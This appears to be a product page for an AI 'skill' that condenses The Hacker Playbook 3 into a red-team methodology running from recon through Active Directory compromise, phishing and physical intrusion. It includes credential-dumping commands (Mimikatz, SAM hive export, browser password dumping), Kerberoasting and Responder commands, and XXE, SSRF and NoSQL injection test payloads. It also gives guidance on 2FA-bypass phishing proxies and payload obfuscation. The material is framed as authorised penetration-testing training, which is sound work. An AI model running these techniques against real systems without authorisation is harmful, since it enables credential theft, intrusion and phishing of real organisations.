technical see the announcement →
The Hacker Playbook 3
The Hacker Playbook 3: Practical Guide to Penetration Testing (Red Team Edition) · ·280 pages
Red team operations playbook — from recon through web exploitation, AD attack paths, lateral movement, and social engineering. Includes lab exercises and real-world attack chains against simulated environments.
Capabilities (9)
- › Conduct red team recon: subdomain enum, GitHub scanning, cloud asset discovery, cert transparency
- › Execute server-side web attacks: SSRF, XXE, SSTI, deserialization, NoSQLi
- › Use Responder + MultiRelay for LLMNR poisoning and NTLM relay attacks
- › Dump credentials from LSASS, SAM hive, and browsers after initial access
- › Run Bloodhound for AD attack path analysis to Domain Admin
- › Execute lateral movement: Pass-the-Hash, WMI, DCOM, Pass-the-Ticket
- › Perform Kerberoasting to crack service account TGS tickets offline
- › Build phishing infrastructure with doppelganger domains and 2FA bypass proxies
- › Apply post-exploitation checklist: persist → escalate → dump creds → map → C2 → objective
How to use
Install this skill and Claude can walk through a full red team engagement lifecycle from passive recon through Active Directory compromise — reasoning through BloodHound attack paths, NTLM relay opportunities, phishing infrastructure design, Kerberoasting targets, and prioritized post-exploitation checklists tailored to specific engagement scopes
Why it matters
Red team engagements fail to deliver value when they lack a structured methodology that connects initial access to business-risk objectives — this playbook's phase-ordered approach ensures operators systematically work through persistence, escalation, and lateral movement rather than getting stuck at perimeter access
Example use cases
- › Analyzing a BloodHound export showing service accounts with SPNs to identify Kerberoasting targets and map the shortest escalation path to Domain Admin
- › Designing a doppelganger domain phishing campaign with a 2FA-bypass reverse proxy for a red team engagement against an organization using Okta SSO
- › Identifying which hosts in a subnet lack SMB signing and outlining a MultiRelay NTLM relay attack chain to achieve lateral movement without cracking credentials
The Hacker Playbook 3 Skill
Red Team vs Penetration Test
| Pentest | Red Team |
|---|---|
| Enumerate and exploit all vulnerabilities | Simulate a specific adversary |
| Report all findings | Achieve specific objective (data exfil, persistence) |
| Time-boxed scope | May run weeks/months undetected |
| Detection is acceptable | Evasion is primary goal |
Phase 1: Recon
Passive Recon
- Nmap diffing: run weekly, compare diffs to detect new services
- Subdomain enumeration:
subfinder,amass, brute-force DNS - GitHub scanning: employees may commit credentials, API keys, internal URLs
- SSL cert parsing:
crt.shshows all certs issued for a domain → subdomain discovery - Cloud asset discovery:
cloud_enum,s3scannerfor misconfigured buckets - Shodan/Censys: find exposed services, ICS devices, cameras
Email Harvesting
theHarvester, LinkedIn, Hunter.io- Build email format from patterns:
first.last@company.com
Phase 2: Web Application Attacks
XSS Attack Chains
- Blind XSS: inject into fields processed by admins; payload calls back to attacker’s server
- DOM-based XSS: payload in URL fragment processed by client-side JavaScript
- XSS to compromise: steal admin session cookie → full account takeover
Dangerous Server-Side Attacks
| Attack | Root Cause | Test |
|---|---|---|
| SSRF | User-supplied URL fetched by server | http://169.254.169.254/latest/meta-data/ |
| XXE | External entities in XML input | <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
| SSTI | Template expression in user input | {{7*7}} → if 49 returned, exploitable |
| Deserialization | Untrusted serialized objects | Language-specific gadget chains |
| NoSQLi | MongoDB operators in JSON input | {"$gt": ""} bypasses authentication |
Phase 3: Network Exploitation
With No Credentials
- Responder: LLMNR/NBT-NS poisoning → capture NTLMv2 hashes
responder -I eth0 -wrf - MultiRelay: NTLM relay attacks for RCE on hosts where SMB signing is off
- CrackMapExec: enumerate users, shares, password policies without credentials
After Initial Access
Credential Collection
# Mimikatz in memory via PowerShell
Invoke-Mimikatz -DumpCreds
# From registry (offline)
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
# Browser creds
Invoke-BrowserPasswordDumpActive Directory Reconnaissance
# Bloodhound: graph-based AD attack path finding
SharpHound.exe -c All
# Import into Bloodhound → find shortest path to Domain Admin
# Service Principal Names (Kerberoasting)
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
# Crack service account TGS tickets offlineLateral Movement Techniques
| Technique | When to Use |
|---|---|
| Pass-the-Hash | Have NTLM hash, SMB signing disabled |
| Pass-the-Ticket | Have valid Kerberos TGT/TGS |
| WMI | Remote execution, less logged than PSExec |
| DCOM | Uses COM objects; evades some detections |
| RDP | Slow, but very stable; requires credentials |
Privilege Escalation (Windows)
- Unquoted service paths
- Weak service permissions (replace binary)
- AlwaysInstallElevated (MSI privilege abuse)
- Token impersonation (SeImpersonatePrivilege → Potato attacks)
Phase 4: Social Engineering
Phishing Infrastructure
- Doppelganger domains: register
company-security.com,companyit.com - Clone authentication portals: capture credentials + relay to real site
- Bypass 2FA: reverse proxy that forwards MFA prompts in real-time (EvilProxy, Modlishka)
Malicious Office Files
- Macro: VBA executes on open/close; common payload delivery
- DDE: Dynamic Data Exchange; executes commands without macros
- Hidden encrypted payloads: self-extracting archives embedded in documents
Payload Evasion
- Encode payloads in Base64, then multiple rounds
- Use
Invoke-Obfuscationfor PowerShell obfuscation - Sign executables with purchased code signing certs
- Use LOLBins (mshta, regsvr32, wmic) to execute payloads
Phase 5: Physical Attacks
Hardware Tools
| Tool | Use Case |
|---|---|
| Bash Bunny | USB HID attack; auto-runs scripts on plug-in |
| Packet Squirrel | Inline network tap; MITM |
| LAN Turtle | Covert remote access over ethernet |
| Flipper Zero | NFC/RFID cloning, sub-GHz |
| WiFi Pineapple | Rogue AP, evil twin attacks |
Access Control Bypass
- RFID card cloning: Proxmark3 reads and emulates proximity cards
- Tailgating: follow badge-holder through door
- Social pretext: “I’m here to fix the copier / check the wiring”
Post-Exploitation Checklist
After initial access, in priority order:
- Establish persistence (scheduled task, registry run key, startup folder)
- Escalate privileges (local admin → domain admin path)
- Dump credentials (SAM hive, LSASS, browser passwords)
- Map the network (Bloodhound, Nmap from inside, CME spray)
- Establish C2 channel (DNS, HTTPS, legitimate cloud services)
- Move laterally to high-value targets (DC, file server, finance)
- Achieve objective (exfil data, demonstrate ransomware capability)